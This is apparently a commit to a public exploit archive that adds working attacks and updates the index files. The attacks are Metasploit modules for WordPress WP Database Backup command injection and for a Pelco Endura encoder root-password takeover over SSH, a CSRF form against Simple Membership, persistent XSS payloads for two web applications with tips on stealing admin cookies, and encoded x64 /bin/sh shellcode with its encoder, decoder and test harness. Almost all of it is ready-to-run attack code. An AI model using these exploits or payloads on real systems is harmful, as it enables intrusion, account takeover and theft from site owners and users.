DB: 2019-07-30

6 changes to exploits/shellcodes Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit) WP Database Backup < 5.2 - Remote Code Execution (Metasploit) WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting GigToDo 1.3 - Cross-Site Scripting Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode
2019-07-30 05:02:12 +00:00 · 2019-07-30 05:02:12 +00:00 · 852694f982
commit 852694f982
parent 6f49190671
8 changed files with 623 additions and 0 deletions
--- a/exploits/php/remote/47187.rb
+++ b/exploits/php/remote/47187.rb
@ -0,0 +1,194 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HTTP::Wordpress
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WP Database Backup RCE',
      'Description'    => %q(
        There exists a command injection vulnerability in the Wordpress plugin
        `wp-database-backup` for versions < 5.2.
        For the backup functionality, the plugin generates a `mysqldump` command
        to execute. The user can choose specific tables to exclude from the backup
        by setting the `wp_db_exclude_table` parameter in a POST request to the
        `wp-database-backup` page. The names of the excluded tables are included in
        the `mysqldump` command unsanitized. Arbitrary commands injected through the
        `wp_db_exclude_table` parameter are executed each time the functionality
        for creating a new database backup are run.
        Authentication is required to successfully exploit this vulnerability.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
        'Shelby Pace'                  # Metasploit module
      ],
      'References'     =>
        [
          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
        ],
      'Platform'       => [ 'win', 'linux' ],
      'Arch'           => [ ARCH_X86, ARCH_X64 ],
      'Targets'        =>
        [
          [
            'Windows',
            {
              'Platform'        => 'win',
              'Arch'            => [ ARCH_X86, ARCH_X64 ]
            }
          ],
          [
            'Linux',
            {
              'Platform'        =>  'linux',
              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
              'CmdStagerFlavor' =>  'printf'
            }
          ]
        ],
      'DisclosureDate' => '2019-04-24',
      'DefaultTarget'  => 0
    ))
    register_options(
    [
      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
    ])
  end
  def check
    return CheckCode::Unknown unless wordpress_and_online?
    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
    res = send_request_cgi(
      'method'  =>  'GET',
      'uri'     =>  changelog_uri
    )
    if res && res.code == 200
      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
      return CheckCode::Detected unless version && version.length > 1
      vprint_status("Version of wp-database-backup detected: #{version[1]}")
      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
    end
    CheckCode::Safe
  end
  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie
    res = create_exclude_table(cookie)
    nonce = get_nonce(res)
    create_backup(cookie, nonce)
    clear_exclude_table(cookie)
  end
  def create_exclude_table(cookie)
    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
    res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
    )
    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
    print_good('Reached the wp-database-backup settings page')
    if datastore['TARGET'] == 1
      comm_payload = generate_cmdstager(concat_operator: ' && ', temp: './')
      comm_payload = comm_payload.join('&&')
      comm_payload = comm_payload.gsub('\'', '')
      comm_payload = "; #{comm_payload} ;"
    else
      comm_payload = " & #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
    end
    table_res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_post' =>
      {
        'wpsetting'                       =>  'Save',
        'wp_db_exclude_table[wp_comment]' =>  comm_payload
      }
    )
    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
    print_good('Successfully added payload as an excluded table')
    res.get_html_document
  end
  def get_nonce(response)
    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response
    div_res = response.at('p[@class="submit"]')
    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res
    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1
    wpnonce[1]
  end
  def create_backup(cookie, nonce)
    first_res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>
      {
        'page'      =>  'wp-database-backup',
        '_wpnonce'  =>  nonce,
        'action'    =>  'createdbbackup'
      }
    )
    res = send_request_cgi(
      'method'    =>  'GET',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_get'  =>
      {
        'page'          =>  'wp-database-backup',
        'notification'  =>  'create'
      }
    )
    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
    print_good('Successfully created a backup of the database')
  end
  def clear_exclude_table(cookie)
    res = send_request_cgi(
      'method'    =>  'POST',
      'uri'       =>  @exclude_uri,
      'cookie'    =>  cookie,
      'vars_post' =>
      {
        'wpsetting'                       =>  'Save',
        'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
      }
    )
   fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
   print_good('Successfully deleted the payload from the excluded tables list')
  end
 end
--- a/exploits/php/webapps/47182.html
+++ b/exploits/php/webapps/47182.html
@ -0,0 +1,24 @@
 # Exploit Title: Cross Site Request Forgery in Wordpress Simple Membership plugin
 # Date: 2019-07-27
 # Exploit Author: rubyman
 # Vendor Homepage: https://wordpress.org/plugins/simple-membership/
 # wpvulndb : https://wpvulndb.com/vulnerabilities/9482
 # Version: 3.8.4
 # Tested on: Windows 8.1
 # CVE : CVE-2019-14328
 #
 # Change localhost to your desired host
 #
 <html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/wordpress/wp-admin/admin.php?page=simple_wp_membership&member_action=bulk" method="POST">
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;from" value="2" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;to" value="3" />
      <input type="hidden" name="swpm&#95;bulk&#95;change&#95;level&#95;process" value="Bulk&#32;Change&#32;Membership&#32;Level" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
 </html>
--- a/exploits/php/webapps/47184.txt
+++ b/exploits/php/webapps/47184.txt
@ -0,0 +1,33 @@
 # Exploit Title: Real Estate 7 - Real Estate WordPress Theme v2.8.9
 Persistent XSS Injection
 # Google Dork: inurl:"/wp-content/themes/realestate-7/"
 # Date: 2019/07/20
 # Author: m0ze
 # Vendor Homepage: https://contempothemes.com
 # Software Link: https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
 # Version: <= 2.8.9
 # Tested on: NginX
 # CVE: -
 # CWE: CWE-79
 Details & Description:
 The «Real Estate 7» premium WordPress theme is vulnerable to persistent XSS
 injection that allows an attacker to inject JavaScript or HTML code into
 the website front-end.
 Special Note:
 - 7.151 Sales
 - If pre moderation is enabled, then u have a huge chance to steal an admin
 or moderator cookies.
 - U can edit any existed listing on the website by changing the unique ID
 -> https://site.com/edit-listing/?listings=XXX (where XXX is WordPress post
 ID, u can find it inside <body> tag class).
 PoC [Persistent XSS Injection]:
 First of all, register a new account as a seller or agent, log in and
 choose free membership package @ the dashboard. After that u'll be able to
 submit a new listing -> https://site.com/submit-listing/
 For persistent XSS injection u need to add ur payload inside the «Vitrual
 Tour Embed» text area (on the «DETAILS» step) and then press «Submit»
 button.
 Example: <img src="x" onerror="(alert)(`m0ze`)">
--- a/exploits/php/webapps/47185.txt
+++ b/exploits/php/webapps/47185.txt
@ -0,0 +1,39 @@
 # Exploit Title: GigToDo - Freelance Marketplace Script v1.3 Persistent XSS Injection
 # Google Dork: -
 # Date: 2019/07/28
 # Author: m0ze
 # Vendor Homepage: https://www.gigtodoscript.com
 # Software Link: https://codecanyon.net/item/gigtodo-freelance-marketplace-script/23855397
 # Version: <= 1.3
 # Tested on: NginX/1.15.10
 # CVE: -
 # CWE: CWE-79
 Details & Description:
 The «GigToDo - Freelance Marketplace Script» web-application is vulnerable
 to reflected and persistent XSS injections that allows an attacker to
 inject JavaScript/HTML code into the front-end, redirect visitor to another
 website or steal admin cookies.
 PoC [Persistent XSS Injection]:
 Register a new account, log in and go to the
 https://www.site.com/proposals/create_proposal page. Vulnerable text area
 is «Proposal's Description», so paste your payload inside, fill in other
 fields and save the data TWICE or your payload WILL NOT WORK. So literally
 paste your payload inside the «Proposal's Description» text area and scroll
 down to «Update Proposal» button, press it and your data will be saved.
 After that u'll be redirected to
 https://www.site.com/proposals/view_proposals.php page. Select your created
 proposal and press green square dropdown menu on the right («Actions»
 column) and click on «Edit» link. After that just don't change anything,
 scroll down to «Update Proposal» button, press it and your data will be
 saved ONE MORE TIME. That's it, now your payload will work.
 Example #1: <h1
 onmouseover=';alert(`m0ze`);'>m0ze</h1>1"--><svg/onload=';alert(`Script is
 fully protected from SQL Injection and XSS ©`);'><img src='x'
 onerror=';alert(`For sure lol`);'>
 Example #2: <h1 onmouseover=';alert(`Greetz from
 m0ze`);'>m0ze</h1>1"--><svg/onload=';window.location.replace(`
 https://twitter.com/m0ze_ru`);'>
--- a/exploits/unix/remote/47186.rb
+++ b/exploits/unix/remote/47186.rb
@ -0,0 +1,160 @@
 ##
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
      'Description'    => %q(
        This module exploits inadequate access controls within the webUI to enable
        the SSH service and change the root password. This module has been tested successfully
        on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Lucas Dinucci <idntk.lucdin@gmail.com>',
          'Vitor Esperança <vitor@machiaveliclabs.com>'
        ],
      'References'     =>
        [
          ['CVE', '2019-6814'],
          ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
        ],
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'     => [ [ "Universal", {} ] ],
      'Privileged'     => true,
      'DisclosureDate' => "Jan 25 2019",
      'DefaultTarget'  => 0))
    register_options(
      [
        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
      ]
    )
    register_advanced_options(
      [
        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end
  def new_password
    datastore['NEW_PASSWORD']
  end
  def check
    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
                 '<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
                 '<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
                 '<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
                 '<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
                 '<a:ReplyTo>'\
                 '<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
                 '</a:ReplyTo>'\
                 '<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
                 '</Header>'\
                 '<Body>'\
                 '<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
                 '<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
                 '</Probe>'\
                 '</Body>'\
                 '</Envelope><?xml version="1.0" encoding="UTF-8"?>'
    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
    udp_sock.put(xmlPayload)
    resp = []
    resp << udp_sock.get(datastore['TIMEOUT'])
    xmlResponse = resp.join(',')
    disconnect_udp
    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
      return Exploit::CheckCode::Appears
    end
     CheckCode::Safe
  end
  def change_password
    print_status("#{peer} - Attempt to change the root password...")
    post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json
    login = send_request_cgi({
      'method' => 'POST',
      'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
      'data' => post,
      'headers' =>
      {
        'Cookie'        => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
        'Content-Type'  => 'application/json;charset=utf-8'
      }
    }, timeout=datastore['TIMEOUT'])
    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
    print_good("#{rhost}:80 - Successfully changed the root password...")
    print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
  end
  def do_login
    change_password
    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => 22,
      :use_agent       => false,
      :config          => true,
      :password        => new_password,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }
    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
      end
    rescue Rex::ConnectionError
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:22 SSH - Disconnected during negotiation"
    rescue ::Timeout::Error
      print_error "#{rhost}:22 SSH - Timed out during negotiation"
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:22 SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
    end
    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      return conn
    end
  end
  def exploit
    conn = do_login
    if conn
      print_good("#{rhost}:22 - Session established ")
      handler(conn.lsock)
    end
  end
 end
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -17582,6 +17582,8 @@ id,file,description,date,author,type,platform,port
 47130,exploits/windows/remote/47130.txt,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow",2019-07-17,hyp3rlinx,remote,windows,
 47137,exploits/windows_x86/remote/47137.py,"MAPLE Computer WBT SNMP Administrator 2.0.195.15 - Remote Buffer Overflow (EggHunter)",2019-07-19,sasaga92,remote,windows_x86,
 47155,exploits/multiple/remote/47155.txt,"Trend Micro Deep Discovery Inspector IDS - Security Bypass",2019-07-24,hyp3rlinx,remote,multiple,
 47186,exploits/unix/remote/47186.rb,"Schneider Electric Pelco Endura NET55XX Encoder - Authentication Bypass (Metasploit)",2019-07-29,Metasploit,remote,unix,
 47187,exploits/php/remote/47187.rb,"WP Database Backup < 5.2 - Remote Code Execution (Metasploit)",2019-07-29,Metasploit,remote,php,80
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -41555,3 +41557,6 @@ id,file,description,date,author,type,platform,port
 47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",2019-07-26,"Wietse Boonstra",webapps,jsp,
 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",2019-07-26,"Wietse Boonstra",webapps,jsp,443
 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",2019-07-26,"Wietse Boonstra",webapps,jsp,80
 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",2019-07-29,rubyman,webapps,php,80
 47184,exploits/php/webapps/47184.txt,"WordPress Theme Real Estate 2.8.9 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
 47185,exploits/php/webapps/47185.txt,"GigToDo 1.3 - Cross-Site Scripting",2019-07-29,m0ze,webapps,php,80
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@ -989,3 +989,4 @@ id,file,description,date,author,type,platform
 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86
 47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86
 47151,shellcodes/linux_x86-64/47151.c,"Linux/x86_64 - Wget Linux Enumeration Script Shellcode (155 Bytes)",2019-07-23,"Kağan Çapar",shellcode,linux_x86-64
 47183,shellcodes/linux_x86-64/47183.c,"Linux/x86 - NOT +SHIFT-N+ XOR-N Encoded /bin/sh Shellcode",2019-07-29,"Pedro Cabral",shellcode,linux_x86-64
--- a/shellcodes/linux_x86-64/47183.c
+++ b/shellcodes/linux_x86-64/47183.c
@ -0,0 +1,167 @@
 /*
 ######################################## description ########################################
 ; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
 ; Author    : Pedro Cabral
 ; Twitter   : @CabrallPedro
 ; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
 ; SLAE ID   : SLAE64 - 1603
 ; Purpose   : spawn /bin/sh shell
 ; Tested On : Ubuntu 16.04.6 LTS
 ; Arch      : x64
 ; Size      : 168 bytes
 ########################################## sh.asm ###########################################
 global _start
 section .text
 _start:
        xor rax, rax
        push rax ; push null
        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
        push rbx ; push to the stack
        mov rdi, rsp ; store the /bin//sh on rdi
        push rax ; push null
        mov rdx, rsp ; set rdx
        push rdi ; push the address of /bin//sh
        mov rsi, rsp ; set rsi
        add rax, 59 ; rax = 59 (execve)
        syscall
 #################################### original shellcode #####################################
 pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
 pedro@ubuntu>ld -N -o sh sh.o
 pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
 "\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"
 ########################################  encode.py  ########################################
 #!/usr/bin/python
 import sys
 if len(sys.argv) != 3:
        print "Usage : python encode.py <SHIFT number> <XOR number>"
        sys.exit(0)
 shift   = int(sys.argv[1])
 xor     = int(sys.argv[2])
 shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")
 # addition to the inicial of the shellcode the SHIFT and XOR values
 encoded_shellcode =""
 encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
 encoded_shellcode += '%02x, ' %shift
 encoded_shellcode += '0x'
 encoded_shellcode += '%02x, ' %xor
 # [NOT + SHL-N + XOR-N] encoded shellcode
 for i in bytearray(shellcode):
 	new = ~i & 0xff
 	new = new << shift
        new = new ^ xor
        encoded_shellcode += '0x'
        encoded_shellcode += '%02x, ' %new
 # end of shellcode
 encoded_shellcode += '0x'
 encoded_shellcode += '%02x, ' %xor
 encoded_shellcode += '0x'
 encoded_shellcode += '%02x' %xor
 # print encoded shellcode
 print encoded_shellcode
 #################################### Encoded Shellcode  #####################################
 pedro@ubuntu>python encoder.py 4 1337
 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
 ####################################### decoder.asm  ########################################
 global _start
 section .text
 _start:
 	jmp decoder
 	encoded : dw 0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539
 decoder:
 	lea rsi, [rel encoded]
 	xor rcx, rcx
 	xor r9,r9
 	xor r10,r10
 	mov word cx, [rsi]
 	inc rsi
 	inc rsi
 	mov word r9w, [rsi]
 	inc rsi
 	inc rsi
 	push rsi
 	mov rdi, rsi
 main: ; 			to deal with 0xff on the original shellcode
 	mov word r10w,[rsi]
 	xor r10w, r9w
 	jz second_check
 main2:
 	shr r10, cl
 	not word r10w
 	mov byte [rdi], r10b
 	inc rsi
 	inc rsi
 	inc rdi
 	jmp short main
 second_check:
 	mov word r10w, [rsi+2]
 	xor r10w, r9w
 	jz call_encoded
 	mov word r10w, [rsi]
 	xor r10w, r9w
 	jmp main2
 call_encoded:
 	call [rsp]
 ###################################### final shellcode ######################################
 pedro@ubuntu>nasm -felf64 decoder.asm -o decoder.o
 pedro@ubuntu>echo;objdump -d ./decoder.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo
 "\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24"
 pedro@ubuntu>gcc -fno-stack-protector -z execstack testShellcode.c -o testShellcode
 pedro@ubuntu>./testShellcode 
 Shellcode Length:	168
 $ whoami
 pedro
 */
 #include<stdio.h>
 #include<string.h>
 unsigned char code[] = \
 "\xeb\x48\x04\x01\x39\x05\x49\x0e\xd9\x09\xc9\x06\xc9\x0f\x49\x0e\x79\x01\x39\x08\xe9\x0c\x59\x0c\x29\x0c\x39\x08\x39\x08\xf9\x0d\x49\x0c\xf9\x0f\x49\x0e\x59\x02\xb9\x04\xc9\x0f\x49\x0e\x59\x02\xe9\x04\xb9\x0f\x49\x0e\x59\x02\xa9\x04\x49\x0e\xf9\x02\xc9\x06\x79\x09\x39\x0a\x99\x0a\x39\x05\x39\x05\x48\x8d\x35\xb1\xff\xff\xff\x48\x31\xc9\x4d\x31\xc9\x4d\x31\xd2\x66\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x66\x44\x8b\x0e\x48\xff\xc6\x48\xff\xc6\x56\x48\x89\xf7\x66\x44\x8b\x16\x66\x45\x31\xca\x74\x15\x49\xd3\xea\x66\x41\xf7\xd2\x44\x88\x17\x48\xff\xc6\x48\xff\xc6\x48\xff\xc7\xeb\xe1\x66\x44\x8b\x56\x02\x66\x45\x31\xca\x74\x0a\x66\x44\x8b\x16\x66\x45\x31\xca\xeb\xd6\xff\x14\x24";
 void main(){
 	printf("Shellcode Length:	%zu\n",strlen(code));
 	int (*ret)() = (int(*)())code;
 	ret();
 }